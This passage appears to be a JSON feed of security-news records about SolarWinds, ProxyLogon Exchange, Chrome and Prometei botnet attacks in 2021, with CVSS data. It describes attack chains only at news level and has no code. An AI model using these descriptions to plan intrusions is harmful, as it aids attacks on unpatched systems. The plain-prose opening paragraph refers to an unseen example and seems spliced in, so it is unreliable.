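Two things the example makes concrete: the check has to run before the bytes reach the deserialiser, not after, and it does nothing to stop arbitrary senders from reaching the queue, which is the residual point Rakhmanov raises about the patched Orion. Parsing a data-only format such as JSON instead of an object graph removes the code-execution sink altogether.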
Trustwave said it intends to release proof-of-concept (PoC) code next week, on February 9.\n\n### Complete Control Over Orion \n\nChief among the vulnerabilities uncovered by Trustwave is the improper use of Microsoft Message Queuing ([MSMQ](<https://docs.microsoft.com/en-us/previous-versions/windows/desktop/msmq/ms711472\\(v=vs.85\\)>)), which is used heavily by the SolarWinds Orion Collector Service, thereby allowing unauthenticated users to send messages to such queues over TCP port 1801 and eventually attain RCE by chaining it with another unsafe deserialization issue in the code that handles incoming messages.\n\n\"Given that the message processing code runs as a Windows service configured to use LocalSystem account, we have complete control of the underlying operating system,\" Trustwave researcher Martin Rakhmanov said.\n\nThe patch released by SolarWinds (Orion Platform [2020.2.4](<https://documentation.solarwinds.com/en/Success_Center/orionplatform/content/release_notes/orion_platform_2020-2-4_release_notes.htm>)) addresses the bug with a digital signature validation step that's performed on arriving messages to ensure that unsigned messages are not processed further, but Rakhmanov cautioned that the MSMQ is still unauthenticated and allows anyone to send messages to it.\n\nThe second vulnerability, also found in the Orion Platform, concerns the insecure manner in which credentials of the backend database (named \"SOLARWINDS_ORION\") are stored in a configuration file, allowing a local, unprivileged user to take complete control of the database, steal information, or even add a new admin-level user to be used inside SolarWinds Orion products.\n\nLastly, a [flaw](<https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28396>) in SolarWinds Serv-U FTP Server 15.2.1 for Windows could allow any 
attacker that can log in to the system locally or via Remote Desktop to drop a file that defines a new admin user with full access to the C:\\ drive, which can then be leveraged by logging in as that user via FTP and read or replace any file on the drive.\n\n### U.S. Department of Agriculture Targeted Using New SolarWinds Flaw\n\nNews of the three vulnerabilities in SolarWinds products comes on the heels of reports that alleged Chinese threat actors exploited a previously undocumented flaw in the company's software to break into the National Finance Center, a federal payroll agency inside the U.S. Department of Agriculture.\n\nThis flaw is said to be different from those that were abused by suspected Russian threat operatives to compromise SolarWinds Orion software that was then distributed to as many as 18,000 of its customers, according to [Reuters](<https://www.reuters.com/article/us-cyber-solarwinds-china-exclusive/exclusive-suspected-chinese-hackers-used-solarwinds-bug-to-spy-on-u-s-payroll-agency-sources-idUSKBN2A22K8>).\n\nIn late December, Microsoft [said](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>) a second hacker collective might have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems by taking advantage of an [authentication bypass vulnerability](<https://thehackernews.com/2020/12/a-new-solarwinds-flaw-likely-had-let.html>) in the Orion API to execute arbitrary commands.\n\nSolarWinds [issued a patch](<https://thehackernews.com/2020/12/a-new-solarwinds-flaw-likely-had-let.html>) to address the vulnerability on December 26, 2020.\n\nLast week, Brandon Wales, acting director of the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA), [said](<https://www.wsj.com/articles/suspected-russian-hack-extends-far-beyond-solarwinds-software-investigators-say-11611921601>) nearly 30% of the private-sector and government agencies linked to the intrusion campaign had no direct connection to SolarWinds, implying that the attackers used a [variety of ways](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>) to breach target environments.\n\nThe overlap in the twin espionage efforts notwithstanding, the campaigns are yet another sign that advanced persistent threat (APT) groups are increasingly focusing on the [software supply chain](<https://thehackernews.com/2021/02/a-new-software-supplychain-attack.html>) as a conduit to strike high-value targets such as corporations and government agencies.\n\nThe trust and ubiquity of software such as that from SolarWinds or Microsoft make it a lucrative target for attackers, thus underscoring the need for organizations to be on the lookout for potential dangers stemming from relying on third-party tools to manage their platforms and services.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-03T11:31:00", "type": "thn", "title": "3 New Severe Security Vulnerabilities Found In SolarWinds Software", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276"], "modified": "2021-02-05T04:43:57", "id": "THN:A16295D1572D6F721B7A8CC6EB7690FA", "href": "https://thehackernews.com/2021/02/3-new-severe-security-vulnerabilities.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:04", "description": "Microsoft has [released emergency patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>) to address four previously undisclosed 
security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.\n\nDescribing the attacks as \"limited and targeted,\" Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.\n\nThe tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.\n\nDiscussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a \"highly skilled and sophisticated actor\" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.\n\nHAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.\n\nThe three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. 
The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.\n\nTo achieve this, as many as [four zero-day vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) discovered by researchers from Volexity and Dubex are used as part of the attack chain \u2014\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): A server-side request forgery (SSRF) vulnerability in Exchange Server\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): An insecure deserialization vulnerability in the Unified Messaging service\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): A post-authentication arbitrary file write vulnerability in Exchange, and\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): A post-authentication arbitrary file write vulnerability in Exchange\n\nAlthough the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for \"Defense in Depth\" purposes.\n\n[](<https://thehackernews.com/images/-_eUnJYSlv7A/YD86dcga76I/AAAAAAAAB7Y/Ex1kb11XGtcD6b878ASeDzA-SFz8SSzNgCLcBGAsYHQ/s0/ms.jpg>)\n\nFurthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external access.\n\nMicrosoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. 
But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.\n\nStating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.\n\n\"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold,\" Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster [explained](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) in a write-up.\n\n\"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems.\"\n\nAside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also [created](<https://twitter.com/GossiTheDog/status/1366858907671552005>) a [nmap plugin](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nGiven the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. 
Customers using a vulnerable version of Exchange Server are advised to install the updates immediately to thwart these attacks.\n\n\"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,\" Microsoft's Corporate Vice President of Customer Security, Tom Burt, [said](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>). \"Promptly applying today's patches is the best protection against this attack.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T07:28:00", "type": "thn", "title": "URGENT \u2014 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", 
"CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T07:56:35", "id": "THN:9AB21B61AFE09D4EEF533179D0907C03", "href": "https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-LOLhcDcH4Q0/YEX4fZpKfUI/AAAAAAAAB9w/I0oQNqeVV2YmhlyC8lyvV-LztA9giv0vACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nMicrosoft on Friday warned of active attacks exploiting [unpatched Exchange Servers](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe.\n\nThe company [said](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \"it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,\" signaling an escalation that the breaches are no longer \"limited and targeted\" as was previously deemed.\n\nAccording to independent cybersecurity journalist [Brian Krebs](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>), at least 30,000 entities across the U.S. 
\u2014 mainly small businesses, towns, cities, and local governments \u2014 have been compromised by an \"unusually aggressive\" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.\n\nVictims are also being reported from outside the U.S., with email systems belonging to businesses in [Norway](<https://nsm.no/aktuelt/oppdater-microsoft-exchange-snarest>), the [Czech Republic](<https://nukib.cz/cs/infoservis/hrozby/1692-vyjadreni-k-aktualni-situaci/>) and the [Netherlands](<https://www.ncsc.nl/actueel/nieuws/2021/maart/8/40-nl-microsoft-exchange-servers-nog-steeds-kwetsbaar>) impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and \"continuously notify these companies.\"\n\nThe colossal scale of the ongoing offensive against Microsoft's email servers also eclipses the [SolarWinds hacking spree](<https://thehackernews.com/2020/12/nearly-18000-solarwinds-customers.html>) that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on an initial reconnaissance of the victim machines.\n\n### Unpatched Exchange Servers at Risk of Exploitation\n\nA successful [exploitation of the flaws](<https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/>) allows the adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access. 
With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.\n\nChief among the vulnerabilities is CVE-2021-26855, also called \"ProxyLogon\" (no connection to ZeroLogon), which permits an attacker to bypass the authentication of an on-premises Microsoft Exchange Server that's able to receive untrusted connections from an external source on port 443. This is followed by the exploitation of CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 post-authentication, allowing the malicious party to gain remote access.\n\nTaiwanese cybersecurity firm Devcore, which began an internal audit of Exchange Server security in October last year, [noted in a timeline](<https://proxylogon.com/>) that it discovered both CVE-2021-26855 and CVE-2021-27065 within a 10-day period between December 10-20, 2020. After chaining these bugs into a workable pre-authentication RCE exploit, the company said it reported the issue to Microsoft on January 5, 2021, suggesting that Microsoft had almost two months to release a fix.\n\n[](<https://thehackernews.com/images/-zR_JCeV5Moo/YEX5KX2rxLI/AAAAAAAAB94/XG6lQGCnfO0ZUBwgiwv9agIbi4TfP1csACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nThe four security issues in question were eventually [patched by Microsoft](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) as part of an emergency out-of-band security update last Tuesday, while warning that \"many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\"\n\nThe fact that Microsoft also patched Exchange Server 2010 suggests that the vulnerabilities have been lurking in the code for more than ten years.\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA), which released an [emergency directive](<https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html>) warning of \"active exploitation\" of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.\n\n\"CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft's IoC detection tool to help determine compromise,\" the agency [tweeted](<https://twitter.com/USCERT_gov/status/1368216461571919877>) on March 6.\n\nIt's worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. Organizations that have been breached to deploy the web shell and other post-exploitation tools continue to remain at risk of future compromise until the artifacts are completely rooted out from their networks.\n\n### Multiple Clusters Spotted\n\nFireEye's Mandiant threat intelligence team [said](<https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html>) it \"observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment\" since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.\n\nNot much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. 
Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding it expects the number to increase as more attacks are detected.\n\nIn a statement to [Reuters](<https://www.reuters.com/article/us-usa-cyber-microsoft/more-than-20000-u-s-organizations-compromised-through-microsoft-flaw-source-idUSKBN2AX23U>), a Chinese government spokesman denied the country was behind the intrusions.\n\n\"There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,\" [said](<https://twitter.com/redcanary/status/1368289931970322433>) Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.\n\nIn one particular instance, the cybersecurity firm [observed](<https://twitter.com/redcanary/status/1367935292724948992>) that some customers' compromised Exchange servers had been loaded with crypto-mining software called [DLTminer](<https://www.carbonblack.com/blog/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>), a malware family documented by Carbon Black in 2019.\n\n\"One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,\" Nickels said. \"Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.\"\n\n### Microsoft Issues Mitigation Guidance\n\nAside from rolling out fixes, Microsoft has published new alternative mitigation guidance to help Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and [releasing a script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for checking HAFNIUM indicators of compromise. 
They can be found [here](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>).\n\n\"These vulnerabilities are significant and need to be taken seriously,\" Mat Gangwer, senior director of managed threat response at Sophos said. \"They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.\"\n\n\"The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,\" Gangwer added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T10:15:00", "type": "thn", "title": "Microsoft Exchange Cyber Attack \u2014 What Do We Know So Far?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", 
"CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-10T08:44:19", "id": "THN:9DB02C3E080318D681A9B33C2EFA8B73", "href": "https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-QHv1N-h4fZY/YD8letBQzWI/AAAAAAAAB64/E1KslMnXt0oEcr7e27y2idTnPPl_nm3VQCLcBGAsYHQ/s0/chrome-hacking.jpg>)\n\nExactly a month after [patching](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) an actively exploited zero-day flaw in Chrome, Google today rolled out fixes for yet another zero-day vulnerability in the world's most popular web browser that it says is being abused in the wild.\n\nChrome 89.0.4389.72, released by the search giant for Windows, Mac, and Linux on Tuesday, comes with a total of 47 security fixes, the most severe of which concerns an \"object lifecycle issue in audio.\"\n\nTracked as CVE-2021-21166, the security flaw is one of the two bugs reported last month by Alison Huffman of Microsoft Browser Vulnerability Research on February 11. 
A separate object lifecycle flaw, also identified in the audio component, was reported to Google on February 4, the same day the stable version of Chrome 88 became available.\n\nWith no additional details, it's not immediately clear if the two security shortcomings are related.\n\n[](<https://thehackernews.com/images/--VPerofAuok/YD8mK08wMrI/AAAAAAAAB7I/VkM_Pg08vFQEvCxV3HbTbaDEd1HRja87QCLcBGAsYHQ/s0/hacking.jpg>)\n\nGoogle acknowledged that an exploit for the vulnerability exists in the wild but stopped short of sharing more specifics to allow a majority of users to install the fixes and prevent other threat actors from creating exploits targeting this zero-day.\n\n\"Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [said](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>).\n\nThis is the second zero-day flaw in Chrome that Google has addressed since the start of the year.\n\nOn February 4, the company [issued a fix](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) for an actively exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript engine. Additionally, Google last year [resolved five Chrome zero-days](<https://thehackernews.com/2020/11/two-new-chrome-0-days-under-active.html>) that were actively exploited in the wild in a span of one month between October 20 and November 12.\n\nChrome users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-03T06:03:00", "type": "thn", "title": "New Chrome 0-day Bug Under Active Attacks \u2013 Update Your Browser ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166"], "modified": "2021-03-13T02:55:42", "id": "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "href": "https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/---oICK3YQu8/YIJ50RG8cxI/AAAAAAAACWY/KkCLoHke1SsfzdcENBXnq3d4jAZlau0ggCLcBGAsYHQ/s0/malware.jpg>)\n\nAttackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new research.\n\n\"Prometei exploits the recently 
disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more,\" Boston-based cybersecurity firm Cybereason [said](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) in an analysis summarizing its findings.\n\nFirst documented by Cisco Talos in July 2020, [Prometei](<https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html>) is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and \"increase the amount of systems participating in its Monero-mining pool.\"\n\n\"Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted infected machines when spreading across the network,\" Cybereason senior threat researcher Lior Rochberger said, adding it's \"built to interact with four different command-and-control (C2) servers which strengthens the botnet's infrastructure and maintains continuous communications, making it more resistant to takedowns.\"\n\nThe intrusions take advantage of the recently patched vulnerabilities in [Microsoft Exchange Servers](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) with the goal of abusing the processing power of the Windows systems to mine Monero.\n\nIn the attack sequence observed by the firm, the adversary was found exploiting Exchange server flaws CVE-2021-27065 and CVE-2021-26858 as an initial compromise vector to install the China Chopper web shell and gain backdoor ingress to the network. With this access in place, the threat actor launched PowerShell to download the initial Prometei payload from a remote server. 
\n\n[](<https://thehackernews.com/images/-QPt-u63tvwA/YIJ6AaW7GPI/AAAAAAAACWg/z8_YGp_eggY-c6gUKoOyrf5D3cZtnDdzwCLcBGAsYHQ/s0/malware.jpg>)\n\nRecent versions of the bot module come with backdoor capabilities that support an extensive set of commands, including an additional module called \"Microsoft Exchange Defender\" that masquerades as a legitimate Microsoft product, which likely takes care of removing other competing web shells that may be installed on the machine so that Prometei gets access to the resources necessary to mine cryptocurrency efficiently.\n\nInterestingly, newly unearthed evidence gathered from [VirusTotal](<https://www.virustotal.com/gui/file/cf542ada135ee3edcbbe7b31003192c75295c7eff0efe7593a0a0b0f792d5256/details>) [artifacts](<https://www.virustotal.com/gui/file/fdcf4887a2ace73b87d1d906b23862c0510f4719a6c159d1cde48075a987a52f/details>) has revealed that the botnet may have been around as early as May 2016, implying that the malware has constantly been evolving ever since, adding new modules and techniques to its capabilities.\n\nPrometei has been observed in a multitude of victims spanning across finance, insurance, retail, manufacturing, utilities, travel, and construction sectors, compromising networks of entities located in the U.S., U.K., and several countries in Europe, South America, and East Asia, while also explicitly avoiding infecting targets in former [Soviet bloc](<https://en.wikipedia.org/wiki/Eastern_Bloc>) countries.\n\nNot much is known about the attackers other than the fact that they are Russian speaking, with older versions of Prometei having their language code set as \"Russian.\" A separate Tor client module used to communicate with a Tor C2 server included a configuration file that's configured to avoid using several exit nodes located in Russia, Ukraine, Belarus, and Kazakhstan.\n\n\"Threat actors in the cybercrime community continue to adopt APT-like techniques and improve efficiency of their operations,\" Rochberger 
said. \"As observed in the recent Prometei attacks, the threat actors rode the wave of the recently discovered Microsoft Exchange vulnerabilities and exploited them in order to penetrate targeted networks.\"\n\n\"This threat poses a great risk for organizations, since the attackers have absolute control over the infected machines, and if they wish so, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\" she added.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-23T07:42:00", "type": "thn", "title": "Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-23T15:00:17", "id": 
"THN:F2A3695D04A2484E069AC407E754A9C1", "href": "https://thehackernews.com/2021/04/prometei-botnet-exploiting-unpatched.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-B1GIJUi-Xfc/YEhXRdorEMI/AAAAAAAAB_o/0vVWsLXOqu0OjfRxUmUTUUvsoLhkTBy6QCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft plugged as many as [89 security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>) as part of its monthly Patch Tuesday updates released today, including fixes for an actively exploited zero-day in Internet Explorer that could permit an attacker to run arbitrary code on target machines.\n\nOf these flaws, 14 are listed as Critical, and 75 are listed as Important in severity, out of which two of the bugs are described as publicly known, while five others have been reported as under active attack at the time of release.\n\nAmong those five security issues are a clutch of vulnerabilities known as [ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allows adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access.\n\nBut in the wake of Exchange servers coming under [indiscriminate assault](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) toward the end of February by multiple threat groups looking to exploit the vulnerabilities and plant backdoors on corporate networks, 